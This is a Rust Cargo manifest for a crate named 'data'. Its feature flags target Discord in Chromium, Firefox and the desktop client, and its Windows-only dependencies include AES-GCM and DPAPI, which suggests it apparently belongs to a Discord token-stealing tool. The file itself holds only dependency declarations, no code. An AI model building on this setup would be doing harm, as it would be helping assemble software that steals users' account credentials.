[package]
name = "data"
version = "0.1.0"
edition = "2021"

# See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html

[dependencies]
serde = "1.0.152"
serde_derive = "1.0.152"


[features]
functions = []
discord-chromium = ["functions"]
discord-firefox = ["functions"]
discord-client = ["functions"]

[target.'cfg(target_os = "windows")'.dependencies]
aes-gcm = "0.10.1"
base64 = "0.20.0"
regex = "1.7.0"
serde_json = "1.0.91"
winapi = { version = "0.3.9", features = ["dpapi", "winbase"] }
